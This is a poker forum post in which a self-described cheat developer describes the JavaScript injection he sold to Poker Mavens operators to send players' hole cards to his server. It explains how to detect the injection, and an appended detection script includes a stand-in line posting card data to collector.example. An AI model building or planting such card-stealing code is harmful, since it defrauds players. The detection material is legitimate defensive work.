Thread: Poker Mavens software hacked to allow superusing for shady operators

  1. #12
    Hello,

    Allow me to introduce myself, although this is an unfortunate event, to provide some authenticity: I am a young developer who has had a history in developing (and reverse engineering) software, games, and auto-traders (for the forex/crypto market). (you can search up some of my other forum posts and sales on Google via my username, as this is not a self-advertising post, rather informative)

    Some small context I would have to state is that the person was dealt a trial version of the patched Poker Mavens cheat, he never obtained the full cheat as he did not finish his payments. I'm assuming he went online searching for people to sell this cheat to fund his own (while making money I see), as the $10k price tag was indeed above the limits for a simple card showing trick.

    Quote Originally Posted by ftpjesus View Post
    So... I don't see anything in the thread here that mentions the 10k so how did he know?? It was on the show. The only other mention of the 10k was my post on Briggsoft where I said I had sent evidence to Kent on the identity of the "seller" and that I wasn't outing on the forum yet. So I'm gonna guess either they read or read the Briggsoft forum regularly which makes me suspicious still that Carbon19 is trying to pretend he's two different people and knows nothing about the seller. But it also reinforces the party in question definitely is a Briggsoft forum regular.
    Although I do understand your concern, do note that I was able to get that price tag from the following post:
    Quote Originally Posted by Dan Druff View Post
    BTW, I feigned interest and the guy wanted $10k for his tool.

    Quote Originally Posted by Dan Druff View Post
    It's some random guy from Lebanon who contacted me, erroneously believing I would want to buy this for the PFA room.
    Please note that I am the one from Lebanon, I am not sure of what his nationality is, or whether he is from the same country or not, I do hope it was not identity theft as stated in my email.

    Quote Originally Posted by KBriggs View Post
    Note that if the hack was a modification/injection of javascript into the client module, that could easily be detected. Since the browser loads the entire client code, (even though it is compressed) a byte for byte comparison against a clean site running the same version would make the hacked portion stand out like a sore thumb. And if that code was passing decrypted hole cards to an external server then you know it's a crooked site. Also using a packet sniffer like Wireshark to see if the client was making external connections to anything other than the File Port or Packet Port of the poker server would also be an indication that something was fishy.

    On the other hand if the hack is simply a passive memory scanner that resides entirely on the server then there's no way to detect that. Other than how Ultimate Bet/Absolute Poker was brought down where they got greedy and let their superuser win too much such that it defied statistical odds (if I recall that correctly).
    These words are indeed real and accurate, and I could not have said better otherwise. I will explain the hack provided and used by fellows among the community and ways to detect the cheating.

    Quote Originally Posted by Dan Druff View Post
    good morning
    i have good news ... now u can know the flop turn river before they will be dealt so u can know who gonna win from the beginning of the hand
    i can let u test it also
    So it looks like you can do even better than superusing. You can have "clairvoyance" which is complete knowledge of the entire hand before it's dealt, which allows you to completely avoid bad beats. Wonderful, huh?

    The second update will be in the next post...
    Although this may or may not be possible (subject for research), the person who had access to my trial version of the cheat was not able to do so (the reason is going to be stated below). Unless he was able to obtain a different cheat from elsewhere, I highly doubt clientside users can access such data beforehand. I did tell him I would try to exploit it for an extra fee, though.

    Now that certain things are cleared, I'd like to explain how to detect the vulnerability from the cheat (in case he had resold it to someone else) as he had violated the code of conduct that is supposed to be respected by both parties.

    Before I do so, I'd like to state that Poker Mavens is indeed secure, it was not as easy as other poker software I've gone through, hence went with a different approach, this one required me to reverse engineer the javascript code on the client-side to make a user send the content to someone else.

    In other words, what the hack does is change the code on each person opening Poker Mavens' browser page, like somewhat a 'spyware' in English, that checks what cards you received, then sends them to my server.

    After listening to PFA's radio, I've seen that Dan stated that Kent did not provide a way to know whether the webserver is infected as a client, although his quotation above does, but not in a visible manner.

    First, press Ctrl+Shift+I on Google Chrome, which will bring up the developer console. Press Sources, and select the javascript file which contains the PokerMinJs javascript code.


    Press Ctrl+F to search, and type in 'ajax', this is served to POST/GET content to the server, note that other cheats may use a different method of intercepting and posting methods, but that was in my case.


    If you can find any $.ajax inside the code, do NOT play on that poker site, as it sends data to the owner on the hand of cards you own.

    Please note that PokerMavens is still on the safer end of other poker software out there, and fortunately, most cheats relating to that software are discoverable by the client. I am not saying it is entirely secure as such a thing does not exist, yet it is on the safer side.

    As Kent had stated, if the owner wants to cheat his clients, he WILL find a way to do so, please do not trust any poker website by its software (even those who are using very expensive software, some were easier to hack than PM itself). I respect this guy's code and ethics on not providing the card showing feature upon a client's request. (By making a good reputation out of his software and himself, and more work to fellow cheat developers like me -- just kidding). Any exposed cheat of mine that goes to ruin the reputation of the software/game will get exposed for fixing as I do not intend to destroy any person's business on the bricks of building my own.

    I'd also like to state that this is not the only way to expose cheats as lots of clients do not load the JS code in such a way, ALL poker software is vulnerable to packet sniffing and memory dump attacks. Some are more secure than others, but the concept is still the same. In the most extreme cases, you can send a replica of your screen to the attacker, making the superuser see what you can see on the table. (this works on almost all online web-based software)

    In PM's case, the data was very well secured from packet intercepting as well, making my job slightly harder:
    Command: "ECards"
    Table: "Ring Game #01"
    Type: "R"
    Salt: "02B18FA165BF3C2F"
    Hand: "22-1"
    Card1: "2C"
    Card2: "98"
    Card3: "64"
    Card4: "0A"
    Card5: "9A"
    Show: "No"
    It does seem he had taken extra precaution on the sniffers, you can always decrypt it with the provided salt, but you'll not be able to intercept them mid-session as it uses the WebSocket's Seed as another key. (which makes packet sniffers less effective in Poker Mavens)

    How could Kent fix this? Several ways, one of the common ways is to double-check the JS file's hash before posting it on the server; another would check the hash of the whole program to prevent its tampering. But I deem this as useless because a hacker will always find a way to hack in ANY ways possible. I suggest only playing poker in trusted real-life casinos, and not through the screen of your computer unless you completely trust the person hosting.

    Do not hesitate to ask any questions regarding this or any other related topic.
    Stay safe!

     
    Comments
      
      Crowe Diddly: informative post from Lebanon rep
    Last edited by Johnaudi; 02-11-2020 at 03:59 AM.
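
Added example, not part of the original post and not Poker Mavens code: a player-side check that combines the byte-for-byte comparison KBriggs describes with the `$.ajax` search from the post. The two bundle strings, the `collector.example` URL and every sink pattern other than `$.ajax` are constructed assumptions; in practice the inputs would be the client file saved from a known-clean site and from the site under review, both running the same version.

```javascript
// Constructed stand-ins for the client bundle served by a known-clean site and
// by the site under review (same software version); not real Poker Mavens code.
const CLEAN = 'function onCards(m){show(m.Card1,m.Card2)}var ws=new WebSocket(url);';
const SUSPECT = 'function onCards(m){show(m.Card1,m.Card2);' +
  '$.ajax({url:"https://collector.example/c",type:"POST",data:m})}' +
  'var ws=new WebSocket(url);';

// Calls that can move data off the page. $.ajax is the one named in the post;
// the rest are assumptions added here to cover other transports.
const SINKS = {
  '$.ajax': /\$\.ajax\s*\(/g,
  '$.post/$.get': /\$\.(post|get)\s*\(/g,
  'fetch': /\bfetch\s*\(/g,
  'XMLHttpRequest': /\bXMLHttpRequest\b/g,
  'sendBeacon': /\bsendBeacon\s*\(/g,
  'WebSocket': /\bnew\s+WebSocket\b/g,
};

// Offset of the first differing character, or -1 if the bundles are identical.
function firstDifference(a, b) {
  const n = Math.min(a.length, b.length);
  for (let i = 0; i < n; i++) if (a[i] !== b[i]) return i;
  return a.length === b.length ? -1 : n;
}

// Count how often each sink appears in a bundle.
function countSinks(src) {
  const out = {};
  for (const [name, re] of Object.entries(SINKS)) out[name] = (src.match(re) || []).length;
  return out;
}

// Compare the suspect bundle against the clean reference: where they diverge,
// and which network-capable calls appear more often than in the reference.
function auditBundle(clean, suspect) {
  const offset = firstDifference(clean, suspect);
  const before = countSinks(clean), after = countSinks(suspect);
  return {
    identical: offset === -1,
    offset,
    context: offset === -1 ? '' : suspect.slice(offset, offset + 40),
    addedSinks: Object.keys(SINKS).filter((k) => after[k] > before[k]),
  };
}

console.log(auditBundle(CLEAN, SUSPECT));
```

Counting sinks relative to the clean reference avoids flagging the WebSocket the legitimate client already opens to the poker server, and any difference at all between two sites on the same version is worth reading at the reported offset.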
